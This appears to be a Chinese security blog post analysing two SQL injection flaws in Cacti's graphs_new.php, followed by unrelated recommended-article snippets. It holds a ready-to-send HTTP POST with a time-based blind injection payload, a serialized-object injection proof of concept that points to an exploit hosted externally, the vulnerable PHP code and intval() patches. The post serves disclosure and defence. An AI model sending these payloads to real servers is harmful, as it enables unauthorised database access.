catalogue
. 漏洞描述
. 漏洞触发条件
. 漏洞影响范围
. 漏洞代码分析
. 防御方法
. 攻防思考
1. 漏洞描述
other SQL injection vulnerability via graphs_new.php in cacti was found, reported to the bug http://bugs.cacti.net/view.php?id=2652
Relevant Link:
http://bobao.360.cn/snapshot/index?id=146936
2. 漏洞触发条件
0x1: POC1: SQL Inject
POST /cacti/graphs_new.php HTTP/1.1
Host: 192.168.217.133
Proxy-Connection: keep-alive
Cache-Control: max-age=
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.217.133 [^]
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://192.168.217.133/cacti/graphs_new.php?host_id=3 [^]
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2
Content-Length: 189
__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save
0x2: POC2: Object Inject
. Login
. POST http://target/cacti/graphs_new.php
Data: __csrf_magic=sid%3A55c34c49f0a1e4abf5739766855abdfa96fbc91b%2C1448716384&action=save&save_component_new_graphs=&host_id=&selected_graphs_array=[injection]
{Injection exp can be found on my server: http://pandas.pw/cacti.exp}
. mysql log: select graph_template_id from snmp_query_graph where id= and benchmark(,sha1())--
3. 漏洞影响范围
4. 漏洞代码分析
0x1: Vuls-1: Object Inject To SQL Inject
/graphs_new.php
/* set default action */
if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = ""; }
switch ($_REQUEST["action"]) {
case 'save':
//track function form_save
form_save();
break;
case 'query_reload':
host_reload_query();
header("Location: graphs_new.php?host_id=" . $_GET["host_id"]);
break;
default:
include_once("./include/top_header.php");
graphs();
include_once("./include/bottom_footer.php");
break;
}
form_save();
function form_save()
{
..
if (isset($_POST["save_component_new_graphs"]))
{
//Track function host_new_graphs_save()
host_new_graphs_save();
header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
}
}
host_new_graphs_save();
function host_new_graphs_save()
{
//variable $selected_graphs_array just unserialized the POST variable which we can control without filter.
$selected_graphs_array = unserialize(stripslashes($_POST["selected_graphs_array"]));
..
//Then the variable goes into a three-dimensional array , and finally the dirty data we can control enter into the select database query, which caused a SQL injection.
$graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);
..
}
0x2: Vuls-2: SQL Injection
function form_save()
{
if (isset($_POST["save_component_graph"]))
{
/* summarize the 'create graph from host template/snmp index' stuff into an array */
while (list($var, $val) = each($_POST))
{
if (preg_match('/^cg_(\d+)$/', $var, $matches))
{
$selected_graphs["cg"]{$matches[]}{$matches[]} = true;
}
//cg_g is not filtered
elseif (preg_match('/^cg_g$/', $var))
{
if ($_POST["cg_g"] > )
{
$selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true;
}
}
elseif (preg_match('/^sg_(\d+)_([a-f0-9]{32})$/', $var, $matches))
{
$selected_graphs["sg"]{$matches[]}{$_POST{"sgg_" . $matches[]}}{$matches[]} = true;
}
}
if (isset($selected_graphs))
{
//外部输入参数带入host_new_graphs中
host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);
exit;
}
header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
}
if (isset($_POST["save_component_new_graphs"])) {
host_new_graphs_save();
header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
}
}
host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);
function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
/* we use object buffering on this page to allow redirection to another page if no
fields are actually drawn */
ob_start();
include_once("./include/top_header.php");
print "
\n";$snmp_query_id = ;
$num_output_fields = array();
while (list($form_type, $form_array) = each($selected_graphs_array)) {
while (list($form_id1, $form_array2) = each($form_array)) {
if ($form_type == "cg") {
//sql injection in graph_template_id
$graph_template_id = $form_id1;
html_start_box("Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "", "center", "");
Relevant Link:
http://seclists.org/fulldisclosure/2015/Dec/att-57/cacti_sqli%281%29.txt
http://bugs.cacti.net/view.php?id=2652
5. 防御方法
/graphs_new.php
function host_new_graphs_save()
{
..
/*$graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);*/
$graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . intval($snmp_query_array["snmp_query_graph_id"]));
..
}
/graphs_new.php
function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
/* we use object buffering on this page to allow redirection to another page if no
fields are actually drawn */
ob_start();
include_once("./include/top_header.php");
print "
\n";$snmp_query_id = ;
$num_output_fields = array();
while (list($form_type, $form_array) = each($selected_graphs_array)) {
while (list($form_id1, $form_array2) = each($form_array)) {
if ($form_type == "cg") {
//sql injection in graph_template_id
$graph_template_id = $form_id1;
/**/
$graph_template_id = intval($graph_template_id);
/**/
html_start_box("Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "", "center", "");
Relevant Link:
http://www.cacti.net/download_cacti.php
6. 攻防思考
Copyright (c) 2016 Little5ann All rights reserved
FlarumChina SQL injection Vulnerability
First,We need to download our vulnerable program in GitHub links:https://github.com/skywalker512/Fla ...
Dede(织梦) CMS SQL Injection Vulnerability
测试方法: @Sebug.net dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! # Dede Cms All Versions Sql Vulnerability ...
MyBB 18 SQL Injection Vulnerability
Input a ...Zabbix 3.0.3 SQL Injection
Zabbix version 3.0.3 suffers from a remote SQL injection vulnerability. ============================ ...
SQL injection
SQL injection is a code injection technique, used to attack data-driven applications, in which malic ...
ref:Manual SQL injection discovery tips
ref:https://gerbenjavado.com/manual-sql-injection-discovery-tips/ Manual SQL injection discovery tip ...
随机推荐
完全卸载mysql步骤
(1) 开始-MySQL-MySQL Server 5.1-MySQL Server Instance Config Wizard--->Remove Instance. (2)点击[开始]-- ...
UVa 10562看图写树(二叉树遍历)
https://uva.onlinejudge.org/index.php?option=com_onlinejudge&Itemid=8&page=show_problem& ...
项目中的Libevent(多线程)
多线程版Libevent //保存线程的结构体 struct LibeventThread { LibEvtServer* that; //用作传参 std::shared_ptr<:t ...>
线性代数-矩阵-【3】矩阵加减 C和C++实现
点击这里可以跳转至 [1]矩阵汇总:http://www.cnblogs.com/HongYi-Liang/p/7287369.html [2]矩阵生成:http://www.cnblogs.com/ ...
Robot Framework 学习笔记(二)-------第一个脚本
robot Framework环境搭建好之后先来一个简单的脚本跑一下 一.新建项目 二.新建测试套件 三.创建测试用例 四.导入Selenium2Library库 因为RF框架编写基于web 的测试 ...
Css Secret 案例全套
Css Secret 案例全套 github地址 案例地址 该书揭示了 47 个鲜为人知的 CSS 技巧,主要内容包括背景与边框.形状. 视觉效果.字体排印.用户体验.结构与布局.过渡与动画等.去年买 ...
(转)Java结束线程的三种方法
背景:面试过程中问到结束线程的方法和线程池shutdown shutdownnow区别以及底层的实现,当时答的并不好. Java结束线程的三种方法 线程属于一次性消耗品,在执行完run()方法之后线程 ...
unicode utf8 学习记录
显示器- unicode -系统- utf8 -存储设备 Unicode是一套复杂的字符编码标准,简单来说就是将人类使用的每个所谓字符与一个非负整数对应,并且保证不同的字符对应的整数一定不同.UTF- ...
Mplayer1.0rc2移植到am335x开发板
因项目需要媒体播放器,所以准备使用QT+Mplayer来做,但遇到了屏幕闪烁的问题,无法满足需求. 1.参考 ,http://blog.csdn.n ...